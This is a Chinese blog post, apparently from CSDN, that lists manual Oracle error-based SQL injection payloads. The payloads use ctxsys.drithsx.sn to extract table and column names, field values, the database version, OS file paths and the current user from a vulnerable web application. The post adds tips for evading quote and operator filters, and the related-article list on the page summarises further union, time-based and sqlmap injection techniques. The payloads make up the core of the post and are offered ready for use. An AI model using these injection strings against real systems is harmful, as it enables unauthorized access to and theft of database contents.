Oracle手工注入命令总结

最新推荐文章于 2024-09-18 20:43:40 发布

OKAY_TC

最新推荐文章于 2024-09-18 20:43:40 发布

阅读量1.6k

点赞数

本文链接：https://blog.csdn.net/qq_37964989/article/details/94718380

版权

sql 专栏收录该内容

2 篇文章 0 订阅

订阅专栏

//若过滤了"" ''，可用not in ('字段')代替

//若过滤了<>，可用!=代替

1. 表名爆破

//返回一条数据

and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))

2. 字段爆破

and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='xx' and rownum=1)) //xx为爆破出的表名

3. 多个字段爆破

and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='xx' and column_name<>'x' and rownum=1)) //x为排除显示该数据

4. 字段值爆破

and 1=ctxsys.drithsx.sn(1,(select A from B where rownum=1)) // A为查询的字段 B为表名

5. 数据库版本信息爆破

and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))

6. 操作系统信息爆破

and 1=ctxsys.drithsx.sn(1,(select member from v$logfile where rownum=1))

7. 当前连接用户信息爆破

and 1=ctxsys.drithsx.sn(1,(select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual))

8. 数据库名爆破

and 1=ctxsys.drithsx.sn(1,(SELECT DISTINCT owner FROM all_tables))

9. 当前用户爆破

and 1=ctxsys.drithsx.sn(1,(SELECT user FROM dual ))

10. 查询指定字段值数量

select count(*) from user_tab_columns where column_name like 'xx'

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

OKAY_TC

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

ORACLE数据库手工注入详解.doc

04-08

ORACLE数据库手工注入详解

oracle报错注入

qq_42097777的博客

04-10

2958

oracle的报错注入的原理和mysql的不一样，但实现的功能是一样的。使用场景是，1、无法回显的盲注 2.当字段数或类型的原因无法使用union联合查询时 1.查询是否有注入点对url后面加上mssql的注释 - -，页面异常后面加上 '- - 页面显示正常，证明有注入点，并要用’进行闭合 2. 利用函数ctxsys.drithsx.sn 进行报错注入函数的用法： 1=ctxsys....

参与评论您还未登录，请先登录后发表或查看评论

oracle手动注入

kfjrlgagkogkhpa的博客

03-23

2220

1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps：Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0，正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入， union select null,n

Oracle SQL injection(SQL注入)

最新发布

zxrhhm的博客

09-18

1013

Oracle SQL injection(SQL注入)

SQL注入-Oracle手工+sqlmap

xiaoheizi的博客

06-28

1361

-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。

Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

T1ngSh0w的博客

09-08

1642

Oracle数据库注入-墨者学院-SQL手工注入漏洞测试(Oracle数据库)详细讲解

封神台Oracle注入- 报错注入

qq_40941912的博客

10-05

1073

一、原理跟MySQL的注入一样，都是程序原本要执行的sql语句拼接了用户输入的语句，导致出现了不该出现的数据。不同的数据库使用的函数不同，Oracle使用的是ctxsys.drithsx.sn函数实现报错注入。二、作业 Oracle注入- 报错注入（Rank: 5）在id=1 后添加and 1=1 发现页面可以正常显示，推断此处可能存在注入点通过报错注入函数查询当前表名：and 1=ctxsys.drithsx.sn(1,(select table_name from user_tabl

Oracle爆错手工注入.doc

04-05

手工注入方式，利用报错注入 Oracle。

Oracle命令

11-12

- **创建用户命令**：在 Oracle 中创建新用户的基本命令格式为： ```sql CREATE USER username IDENTIFIED BY password; ``` 例如创建名为 `deng` 的用户，密码为 `123456`： ```sql CREATE USER deng ...

oracle维护常用命令

06-28

oracle维护常用命令

Oracle中 lsnrctl命令使用总结(推荐)

09-09

Oracle中的`lsnrctl`命令是管理Oracle数据库监听器（Listener）的重要工具，它提供了对监听器进行控制、查看状态和配置的多种功能。监听器是Oracle数据库系统中不可或缺的一部分，它负责接收客户端的连接请求，并将...

SQL：oracle 插入时间

热门推荐

m0_48878336的博客

08-15

1万+

SQL：oracle 插入时间

Oracle数据库注入

weixin_50464560的博客

08-06

1656

0x01 前言在渗透测试过程中，总是遇到不熟悉的数据库，知道了有SQL注入漏洞但是无法利用，这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的，当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰，无法成功利用。故学习了Oracle数据库注入的相关知识，在此总结分享给大家，希望能够对安全从业人员有所帮助。全文基于对于SQL注入具有一定理解，并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注...

【实战】Oracle注入总结

weixin_30784945的博客

01-08

304

小结： Union联合查询：　　order by 定字段　　and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型，方法如下　　and 1=2 union select 'null',null...... from dual 返回正常，说明第一个字段是字符型，反之为数字型　　　　第一个字段是字符型，判断第二个字段类型：　...

Oracle注入——报错注入

希望我的博客，能帮上你解决学习中工作中所遇到的问题

05-20

1670

Oracle注入——报错注入原理：同MYSQL数据库差不多，但是一些语法不同，相比其他数据库，Oracle数据库的数据类型更加严谨，由于过度严谨，所以，我们用显错注入，会比较麻烦，于是，我们利用报错的方法，忽视数据类型，直接获取数据CTXSYS.DRITHSX.SN(user,()) Dual是一个实表（也有人说它是虚表），如果你直接查询它，它只显示一个X，列名为DUMMY 那么要它有什么用妮？它实际上是为了满足查询语句的结构而产生比如你想查询你的用户名 select user from Dual

Oracle手工注入

2301_80402555的博客

08-20

768

id=1 order by 3 1 2 Python48 使⽤字符型数据，整型字段使⽤整型数据才可以。

Oracle数据库手工注入

只为成最好的自己

09-27

5453

一、出现注入点的原因：程序员在编写代码时没有对用户输入的字符进行特殊处理。导致用户输入的特殊字符附带在参数中直接与数据库进行交互。二、注入过程 1、打开一个连接地址：在网址后面加and 1=1 正常，and 1=2 错误。说明存在注入漏洞、 2、判断一下数据库中的表 and (select count(*) from admin) 3、判断一下该网站有几个管理员。 and

oracle延时盲注如何防止,关于oracle延时型注入手工注入的思考

weixin_29250403的博客

04-07

554

平时遇到oracle注入的情况不是很多，今天遇到一处oracle注入的延时型注入，简单记录一下。测试和漏洞挖掘中，通过页面响应时间状态，通过这种方式判断SQL是否被执行的方式，便是延时性注入，oracle延时性注入和其他的数据库不同，oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE()，也是通过sqlmap和网上师傅们的文章才知道的，当去手注的时候大脑一片空白，网上...

oracle 数据库时间的插入

weixin_47115586的博客

12-12

2293

oracle 数据库时间的插入插入时间的时候可以使用sysdate 精确到秒也可以使用systimestamp相对于sysdate更精确 create TABLE TMP_TEST_TABLE ( ID VARCHAR(36) NOT NULL, NAME VARCHAR(4) NOT NULL, AGE INTEGER NULL, BIRTHYEAR VARCHAR(4) NULL, "CREATEDTIME" TIMESTAMP (6) NOT NULL ENABLE ) INSERT INTO

Oracle系统启动与常用命令总结

Oracle数据库是企业级关系型数据库管理...同时，了解Oracle命令的执行顺序和逻辑可以帮助提高工作效率，避免不必要的错误。对于更复杂的操作，如备份、恢复、数据迁移等，Oracle也提供了丰富的命令和工具供用户使用。